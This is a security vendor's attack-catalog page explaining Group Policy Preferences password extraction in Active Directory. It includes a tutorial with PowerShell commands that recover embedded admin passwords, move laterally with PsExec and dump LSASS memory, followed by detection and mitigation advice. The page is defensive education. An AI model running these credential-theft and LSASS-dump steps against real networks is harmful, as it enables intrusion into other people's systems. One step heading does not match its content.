Magic Quadrant™ for Privileged Access Management 2025: Netwrix Recognized for the Fourth Year in a Row. Download the report.

Contact usSupportCommunity
English Español Italiano Français Deutsch Português
Platform
Solutions

Data Security Posture Management

Discover and classify data in hybrid environments. Assess, prioritize, and mitigate risks to sensitive data.

Directory Management

Simplify and secure directory operations by cutting down on complexity, risk, and manual effort.

Endpoint Management

Secure endpoints and prevent data loss while keeping teams productive — no matter where they work.

Identity Management

Secure every identity, streamline every process, and stay ahead of compliance — without adding complexity.

Identity Threat Detection & Response

Stay ahead of identity-based threats — proactively remediate risks, block attacks, and ensure rapid recovery.

Privileged Access Management

Shrink your attack surface by killing standing privileges, locking down credentials, and monitoring privileged sessions.
Featured Products See all products
Netwrix AuditorNetwrix Access AnalyzerNetwrix PingCastleNetwrix Endpoint Protector

The Netwrix 1Secure™ Platform

Explore
Netwrix AI Environments we protect Integrations MSPs Active Directory Security Risks Compliance Pricing
Resource Center See All
BlogAttack CatalogComplianceCustomer StoriesCybersecurity FrameworksCybersecurity GlossaryEventsFreewareGuidesIdeas PortalNewsPodcastsPublicationsProduct AnnouncementsResearchWebinars
Asset not found

Featured Customer Story

DXC Technology Enables Customers to Achieve PCI DSS Compliance and Focus on Strategic Initiatives
Partners
Partner ProgramBecome a PartnerMSPsPartner LocatorWebinars
Asset not found

Featured Customer Story

AppRiver Enhances Control over Active Directory While Significantly Reducing Auditing Time
Asset not found

Featured Customer Story

MSP Helps Client Recover from Ransomware in 6 Hours
Why Netwrix
About UsLeadershipNetwrix AICustomer StoriesRecognitionNewsCareers
Asset not found

Featured Customer Story

Horizon Leisure Centres Accelerates Data Classification to Comply with GDPR and Saves £80,000 Annually
Asset not found

Featured Customer Story

Samsung R&D Institute Secures Data with Cross-Platform Use and Fast macOS Deployment Using Netwrix Endpoint Protector
Cybersecurity glossaryAttack catalog
Plaintext Password Extraction Attack

Plaintext Password Extraction Attack

Group Policy is essential in managing an Active Directory environment. In particular, administrators use it to centrally manage configurations applied to domain-joined servers and workstations; these Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify. Unfortunately, Group Policy enabled administrators to embed passwords in Group Policy preferences that created local users or mapped network drives — and those passwords were encrypted with a publicly available key. Therefore, an adversary with the ability to read these policies can readily extract and decrypt these passwords.In 2014, Microsoft released a security update that removes the ability to create new preferences with embedded passwords, but many organizations still have Group Policy preferences that include embedded passwords.

Threat Summary

Target: Active Directory

Tools: PowerSploit, Metasploit

ATT&CK® Tactic: Credential Access

ATT&CK Technique: T1552.006

Difficulty

Detection: Low

Mitigation: Low

Response: Low

Attack Tutorial: How a Plaintext Password Extraction Attack Works

STEP 1: Discover passwords in Group Policy preferences

Group Policy preferences are stored as XML files in the SYSVOL share on domain controllers. The SYSVOL share is accessible to Authenticated Users, so an adversary who has gained a foothold within the network can access its contents. An adversary can parse these XML files manually, looking for instances of the attribute CPassword, which contains the encrypted passwords. Adjacent attributes provide other details, like the username. Or they can use tools like PowerSploit’s Get-GPPPasswords cmdlet to automate the process of acquiring and decrypting these passwords, as shown below.

      PS> Import-Module PowerSploit

PS> Get-GPPPassword

Changed : {2020-08-17 11:14:01}

UserNames : {Administrator (built-in)}

NewName : [BLANK]

Passwords : {WhatAGreatPassword123!}

File : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml

PS>

STEP 2: Modify the AdminSDHolders ACL

Now that the adversary has the username and password for a local administrator, they can enumerate the computers in Active Directory on which the Group Policy is applied, which provides them with a list of computers to which they can authenticate using this credential.With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary connects to another computer and creates a memory dump of the LSASS.exe process to enable further lateral movement or privilege escalation.

      PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml

PS> $XML.GPO.LinksTo

SOMName SOMPath Enabled NoOverride

------- ------- ------- ----------

Comp domain.com/Comp true false

PS> $DN = Get-ADOrganizationalUnit -filter { Name -eq $XML.GPO.LinksTo.SOMName } | Select -expand DistinguishedName

PS> Get-ADComputer -filter "*" -SearchBase $DN

DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com

DNSHostName :

Enabled : True

Name : Server1

ObjectClass : computer

ObjectGUID : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf

SamAccountName : SERVER1$

SID : S-1-5-21-5840559-2756745051-1363507867-16924

UserPrincipalName :

PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe

PsExec v2.2 - Execute processes remotely

Copyright (C) 2001-2016 Mark Russinovich

Sysinternals - www.sysinternals.com
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

PS>

Detect, Mitigate and Respond

Detect

Difficulty: Low

Because of the large volume of read operations occurring in normal operations, it is not possible to directly detect an adversary’s access to these files. However, conducting an audit for passwords embedded in Group Policy Preferences is possible using the same techniques an adversary would use. Using the Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this will also reveal the plaintext). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them:

      # Replace this path with the path to SYSVOL to check

$SYSVOL_Path = "\\domain.com\sysvol"

Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"

# Sample Output using \\domain.com\sysvol

\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Gro

ups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"

name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01"

uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local

Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0"

neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>

Mitigate

Difficulty: Low

Simply put, all embedded passwords in Group Policy preferences should be removed. Additionally:

  • Ensure that all domain controllers are running current operating system versions with the latest patches, since current versions of Windows Server do not permit the embedding of passwords in Group Policy preferences.
  • Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
  • Adopt solutions that replace embedded passwords with authenticated dynamic lookups.

Respond

Difficulty: Low

Should you discover embedded passwords in Group Policy preferences, the following actions can be taken:

  • Remove the embedded password from the Group Policy preference.
  • Reset the password for the account.

Share on

View related cybersecurity attacks

Abusing Entra ID Application Permissions – How It Works and Defense Strategies

AdminSDHolder Modification – How It Works and Defense Strategies

AS-REP Roasting Attack - How It Works and Defense Strategies

Hafnium Attack - How It Works and Defense Strategies

DCSync Attacks Explained: Threat to Active Directory Security

Group Managed Service Accounts Attack

Golden SAML Attack

Understanding Golden Ticket Attacks

DCShadow Attack – How It Works, Real-World Examples & Defense Strategies

ChatGPT Prompt Injection: Understanding Risks, Examples & Prevention

NTDS.dit Password Extraction Attack

Kerberoasting Attack – How It Works and Defense Strategies

Pass the Hash Attack

Pass-the-Ticket Attack Explained: Risks, Examples & Defense Strategies

Password Spraying Attack

Zerologon Vulnerability Explained: Risks, Exploits and Mitigation

Active Directory Ransomware Attacks

Unlocking Active Directory with the Skeleton Key Attack

Lateral Movement: What Is It, How It Works And Preventions

Man-in-the-Middle (MITM) Attacks: What They Are & How to Prevent Them

Why Is PowerShell So Popular for Attackers?

4 Service Account Attacks and How to Protect Against Them

How to Prevent Malware Attacks from Impacting Your Business

What is Credential Stuffing?

Compromising SQL Server with PowerUpSQL

What Are Mousejacking Attacks, and How to Defend Against Them

Stealing Credentials with a Security Support Provider (SSP)

Rainbow Table Attacks: How They Work and How to Defend Against Them

A Comprehensive Look into Password Attacks and How to Stop Them

LDAP Reconnaissance

Bypassing MFA with the Pass-the-Cookie Attack

Silver Ticket Attack